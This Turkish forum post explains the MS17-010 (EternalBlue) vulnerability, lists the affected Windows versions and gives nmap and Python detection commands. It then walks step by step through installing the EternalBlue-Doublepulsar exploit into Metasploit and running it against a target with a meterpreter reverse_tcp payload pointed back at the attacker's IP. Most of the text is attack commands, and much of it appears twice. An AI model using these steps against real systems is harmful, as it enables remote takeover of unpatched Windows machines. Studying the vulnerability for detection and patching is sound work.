- 10 Ağu 2019
- 985
- 17
Eternal Blue Zafiyeti Nedir?
MS17-010, NSA(National Security Agency) tarafından geliştirilen ancak sonradan sızdırılan bir zafiyettir.
Bu zafiyetten etkilenebilecek sistemler aşağıdaki listede bulunmaktadır.
Zafiyet tespitler için nmap, zenmap gibi toollar kullanılabilir.
Nmap'de MS17-010 zafiyeti tespiti için aşağıdaki parametreleri kullanmak yeterli olacaktır.
"nmap -p445 --script smb-vuln-ms17-010 (hedef cihaz ip adresi)"
-p: Kaçıncı portun taranacağını belirten parametredir. Zafiyet smb 445 portundan kaynaklandığı için bu port taranmaktadır.
--script: Özel bir script belirtilmek istendiğinde bu parametre kullanılır. "--script smb-vuln-ms17-010" yazılarak bu açığın incelenmesinin istenildiği belirtilmektedir.
Ayrıca MS17-010 zafiyeti tespiti için özel bir tool oluşturulmuştur. Bu tool aracılığıyla hedef sistemde zafiyet tespiti yapılabilir.
Scriptin saldırgan cihazına kopyalanması için aşağıdaki komut kullanılmaktadır.
Script saldırganın cihazına kopyalandıktan sonra belirlenen dizinde "smb_exploit.py" isimli bir python dosyası olması gerekmektedir.
Scripti çalıştırmak ve hedef cihaz Eternal Blue tespiti için aşağıdaki komutu yazmak yeterli olacaktır.
Met@sploit ile MS17-010 Tespiti
Terminale aşağıdaki komut yazılarak met@sploit açılır.
Ardından use auxiliary komutu ile taranacak zafiyet belirlenir.
Hedef cihazın IP adresi belirlenir
"run" komutu ile tarama başlatılır.
Eğer zafiyet tespit edildiyse aşağıdakine benzer bir yazı alınmaktadır.
" Host is likely VULNERABLE to MS17-010
Met@sploit'e MS17-010 Exploitinin Eklenmesi
Exploit işlemleri için wine32'nin kurulu olması gerekmektedir.
Kullanılan işletim sistemi 64 bit ise aşağıdaki komutlar kullanılarak wine32 kurulabilir.
"dpkg --add-architecture i386 && apt-get update && apt upgrade -y && apt autoremove"
"apt-get install wine32"
Exploitin met@sploite eklenmesi için met@sploitin database(veritabanı) olarak kullandığı servis çalıştırılmalıdır.
service postgresql start
Ardından met@sploit içerisinde smb exploitlerinin bulunduğa dosya lokasyonuna gelinir.
cd /usr/share/met@sploit-framework/modules/exploits/windows/smb/
Bu lokasyona Eternal Blue için kullanılacak exploit eklenir.
wget https://github.com/ElevenPaths/Eternalblue-Doublepulsar-met@sploit/blob/master/eternalblue_doublepulsar.rb
(@ yerine "a" gelecek)
Eklenen exploitin met@sploit tarafından algılanabilmesi için postgresql servisi tekrardan çalıştırılır
service postgresql start
Exploitin çalışması için gerekli olan dosyalar indirilir ve indirilen klasörün içerisine girilir.
git clone https://github.com/ElevenPaths/[email protected]
(@ yerine "a" gelecek)
cd Eternalblue-Doublepulsar-met@sploit/
cd deps/
Herhangi bir yazı editörü aracılığıyla exploitin kaynak kodları açılır.
nano /usr/share/met@sploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb
TARGETARCHITECTURE ve ETERNALBLUEPATH yazan yerlere /root/Eternalblue-Doublepulsar-met@sploit/dep dizini eklenir
Eternal Blue Sömürme İslemleri
met@sploit Açılır
Exploit Belirlenir
Hedef IP Belirlenir
Hedef İsletim Sistemine Göre Target Belirlenir
Hedefin 64 ya da 32 bit olduğu seçilir
Payload Belirlenir
Saldırganın IP Adresi Girilir
"run" denilerek işlem başlatılır ve sorun yoksa hedef makine ile iletişim kurulur.
MS17-010, NSA(National Security Agency) tarafından geliştirilen ancak sonradan sızdırılan bir zafiyettir.
Bu zafiyetten etkilenebilecek sistemler aşağıdaki listede bulunmaktadır.
Eternal Blue Zafiyet TespitiWindows Server 2003 SP0 (x86)
Windows XP (all services pack) (x86) (x64)
Windows Server 2003 SP1/SP2 (x86)
Windows Server 2003 (x64)
Windows Vista (x86)
Windows Vista (x64)
Windows Server 2008 (x86)
Windows 7 (all services pack) (x86) (x64)
Windows Server 2008 R2 (x86) (x64)
Zafiyet tespitler için nmap, zenmap gibi toollar kullanılabilir.
Nmap'de MS17-010 zafiyeti tespiti için aşağıdaki parametreleri kullanmak yeterli olacaktır.
"nmap -p445 --script smb-vuln-ms17-010 (hedef cihaz ip adresi)"
-p: Kaçıncı portun taranacağını belirten parametredir. Zafiyet smb 445 portundan kaynaklandığı için bu port taranmaktadır.
--script: Özel bir script belirtilmek istendiğinde bu parametre kullanılır. "--script smb-vuln-ms17-010" yazılarak bu açığın incelenmesinin istenildiği belirtilmektedir.
Ayrıca MS17-010 zafiyeti tespiti için özel bir tool oluşturulmuştur. Bu tool aracılığıyla hedef sistemde zafiyet tespiti yapılabilir.
Scriptin saldırgan cihazına kopyalanması için aşağıdaki komut kullanılmaktadır.
Kod:
wget https://github.com/nixawk/labs/blob/master/MS17_010/smb_exploit.py
Scripti çalıştırmak ve hedef cihaz Eternal Blue tespiti için aşağıdaki komutu yazmak yeterli olacaktır.
Kod:
python smb_exploit.py (hedef cihaz ip adresi)
Met@sploit ile MS17-010 Tespiti
Terminale aşağıdaki komut yazılarak met@sploit açılır.
Kod:
"msfconsole"
Ardından use auxiliary komutu ile taranacak zafiyet belirlenir.
Kod:
"use auxiliary/scanner/smb/smb_ms17_010"
Hedef cihazın IP adresi belirlenir
Kod:
"set rhosts (hedef ip adresi)"
"run" komutu ile tarama başlatılır.
Eğer zafiyet tespit edildiyse aşağıdakine benzer bir yazı alınmaktadır.
" Host is likely VULNERABLE to MS17-010
Met@sploit'e MS17-010 Exploitinin Eklenmesi
Exploit işlemleri için wine32'nin kurulu olması gerekmektedir.
Kullanılan işletim sistemi 64 bit ise aşağıdaki komutlar kullanılarak wine32 kurulabilir.
"dpkg --add-architecture i386 && apt-get update && apt upgrade -y && apt autoremove"
"apt-get install wine32"
Exploitin met@sploite eklenmesi için met@sploitin database(veritabanı) olarak kullandığı servis çalıştırılmalıdır.
service postgresql start
Ardından met@sploit içerisinde smb exploitlerinin bulunduğa dosya lokasyonuna gelinir.
cd /usr/share/met@sploit-framework/modules/exploits/windows/smb/
Bu lokasyona Eternal Blue için kullanılacak exploit eklenir.
wget https://github.com/ElevenPaths/Eternalblue-Doublepulsar-met@sploit/blob/master/eternalblue_doublepulsar.rb
(@ yerine "a" gelecek)
Eklenen exploitin met@sploit tarafından algılanabilmesi için postgresql servisi tekrardan çalıştırılır
service postgresql start
Exploitin çalışması için gerekli olan dosyalar indirilir ve indirilen klasörün içerisine girilir.
git clone https://github.com/ElevenPaths/[email protected]
(@ yerine "a" gelecek)
cd Eternalblue-Doublepulsar-met@sploit/
cd deps/
Herhangi bir yazı editörü aracılığıyla exploitin kaynak kodları açılır.
nano /usr/share/met@sploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb
TARGETARCHITECTURE ve ETERNALBLUEPATH yazan yerlere /root/Eternalblue-Doublepulsar-met@sploit/dep dizini eklenir
Eternal Blue Sömürme İslemleri
met@sploit Açılır
Kod:
msfconsole
Exploit Belirlenir
Kod:
use exploit/windows/smb/eternalblue_doublepulsar
Hedef IP Belirlenir
Kod:
set rhost (Hedef Cihaz IP Adresi)
Hedef İsletim Sistemine Göre Target Belirlenir
Kod:
set target (Hedef Sistem)
Hedefin 64 ya da 32 bit olduğu seçilir
Kod:
set targetarchitecture x(bit)
Payload Belirlenir
Kod:
set payload windows/x64/meterpreter/reverse_tcp
Saldırganın IP Adresi Girilir
Kod:
set lhost (saldırgan ip adresi)
"run" denilerek işlem başlatılır ve sorun yoksa hedef makine ile iletişim kurulur.
Moderatör tarafında düzenlendi: